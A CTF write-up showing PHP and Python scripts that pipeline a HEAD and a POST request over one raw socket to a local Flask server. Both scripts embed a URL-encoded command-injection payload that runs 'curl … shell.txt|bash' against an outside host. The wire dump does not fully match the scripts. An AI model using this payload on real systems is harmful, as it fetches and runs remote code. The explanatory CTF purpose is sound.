Request smuggling when sending HTTP requests over a raw socket

Overview

I ran into this while working on a CTF challenge, so here is a short write-up.



Code

Server side

#!/usr/bin/env python3
# i use arch btw

from flask import Flask, request
from werkzeug.serving import WSGIRequestHandler

app = Flask(__name__)


@app.route('/', methods=['GET', 'POST', 'HEAD'])
def index():
    print("请求一")  # "request one": logged when the first request is handled
    return 'result -1'


@app.route('/api/v1/notes/', methods=['GET', 'POST'])
def notes():
    print("请求二")  # "request two": logged when the second request is handled
    return "result -2"


# HTTP/1.1 enables keep-alive, so several requests can arrive on one connection.
WSGIRequestHandler.protocol_version = "HTTP/1.1"
app.run(host='0.0.0.0', port=3337, debug=False)


PHP smuggling
<?php
  $srv_ip = '127.0.0.1';   // address of the target service
  $srv_port = 3337;        // port
  $url = '/api/v1/notes/'; // path that receives the POST
  $fp = '';
  $errno = 0;              // error handling
  $errstr = '';            // error handling
  $timeout = 10;           // give up if no connection is made within this many seconds
  $post_str = "username=demo&password=hahaha"; // body to submit (not sent: the POST below is written without a body)
  // Open the network socket connection.
  $fp = fsockopen($srv_ip, $srv_port, $errno, $errstr, $timeout);
  if (!$fp) {
    die("fp fail: $errstr ($errno)\n");
  }
  $content_length = strlen($post_str);
  // First request: a bodiless HEAD whose headers end at the blank line ...
  $post_header = "HEAD / HTTP/1.1\r\n";
  $post_header .= "Connection: keep-alive\r\n";
  $post_header .= "Host: 127.0.0.1\r\n\r\n";
  // ... followed, in the same write, by the second request.
  $post_header .= "POST " . $url . "?title=%27%3Bcurl%20http%3A//gem-love.com/shell.txt%7Cbash%20%23 HTTP/1.1\r\n";
  $post_header .= "User-Agent: archlinux\r\n";
  $post_header .= "Accept: */*\r\n\r\n";
  //$post_header .= $post_str."\r\n\r\n";
  fwrite($fp, $post_header);

  $inheader = 1;
  while (!feof($fp)) { // test whether the file pointer has reached the end of the stream
    $line = fgets($fp, 1024);
    // Skip the header block of the first response; print everything after it.
    if ($inheader && ($line == "\n" || $line == "\r\n")) {
      $inheader = 0;
    }
    if ($inheader == 0) {
      echo $line;
    }
  }
  fclose($fp);
  unset($line);
?>


Python smuggling
import socket
import traceback


def check_link():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(4)
        s.connect(("127.0.0.1", 3337))
        # Two requests in one write: a bodiless HEAD (headers end at the blank
        # line) followed directly by the POST.
        wef = (b'HEAD / HTTP/1.1\r\nConnection: keep-alive\r\nHost: 127.0.0.1\r\n\r\n'
               b'POST /api/v1/notes/?title=%27%3Bcurl%20http%3A//gem-love.com/shell.txt%7Cbash%20%23 HTTP/1.1\r\n'
               b'User-Agent: archlinux\r\n\r\n')
        print(wef.decode("utf-8"))
        s.sendall(wef)
        # Only the first response (the one to the HEAD) is read here.
        response = s.recv(4096)
        s.close()
        return b'200 OK' in response
    except Exception as e:
        traceback.print_exc()
        print(e)
        return False


check_link()

The HTTP data sent on the wire is:

HEAD / HTTP/1.1
Connection: keep-alive
Host: 127.0.0.1

POST /api/v1/notes/?title=%27%3Bcurl%20http%3A//gem-love.com/shell.txt%7Cbash%20%23 HTTP/1.1
Content-Length: 6
User-Agent: archlinux
Accept: */*

That is, each request's header block is terminated by an empty line (a trailing \r\n), and the data of the POST request follows right after it; the POST data itself needs no trailing \r\n, because the server delimits the body by its Content-Length rather than by a line terminator.
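To see how a keep-alive server carves the bytes written above into separate requests, here is an added example (not code from the original post): a minimal HTTP/1.1 request-stream splitter that stops at the first empty line of each head, takes the body length from Content-Length (absent means no body), and then starts the next request immediately. The function name and the sample bytes are constructed for this page, with a benign query string in place of the CTF payload.

```python
# Added example: splits one socket payload into the individual HTTP/1.1
# requests a keep-alive server would see. Names and sample data are
# constructed for illustration.
from typing import Dict, List, Tuple


def split_requests(stream: bytes) -> Tuple[List[Dict], bytes]:
    """Return (complete_requests, leftover_bytes).

    leftover_bytes is data that cannot yet form a complete request, e.g. a
    head without its terminating blank line, or a body that Content-Length
    promises but that has not arrived on the socket yet.
    """
    requests: List[Dict] = []
    pos = 0
    while pos < len(stream):
        end = stream.find(b"\r\n\r\n", pos)
        if end == -1:  # head not terminated yet: wait for more data
            break
        head = stream[pos:end].decode("iso-8859-1")
        lines = head.split("\r\n")
        method, target, version = lines[0].split(" ", 2)
        headers: Dict[str, str] = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")  # partition keeps ':' in values such as Host
            headers[name.strip().lower()] = value.strip()
        body_len = int(headers.get("content-length", "0"))
        body_start = end + 4
        if len(stream) - body_start < body_len:  # body promised but incomplete
            break
        requests.append({
            "method": method, "target": target, "version": version,
            "headers": headers,
            "body": stream[body_start:body_start + body_len],
        })
        pos = body_start + body_len  # next request begins right after the body
    return requests, stream[pos:]


# Constructed sample: a bodiless HEAD followed directly by a POST in one write,
# mirroring the scripts above but with a harmless query string.
PIPELINED = (b"HEAD / HTTP/1.1\r\nConnection: keep-alive\r\nHost: 127.0.0.1:3337\r\n\r\n"
             b"POST /api/v1/notes/?title=hello HTTP/1.1\r\nUser-Agent: archlinux\r\n"
             b"Content-Length: 5\r\n\r\nhello")

if __name__ == "__main__":
    reqs, rest = split_requests(PIPELINED)
    for r in reqs:
        print(r["method"], r["target"], r["body"])
    print("leftover:", rest)
```

Feeding the second sample a POST that declares Content-Length: 6 but carries no body leaves the whole POST as leftover, which is what a server blocks on when the declared length and the bytes actually written disagree.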
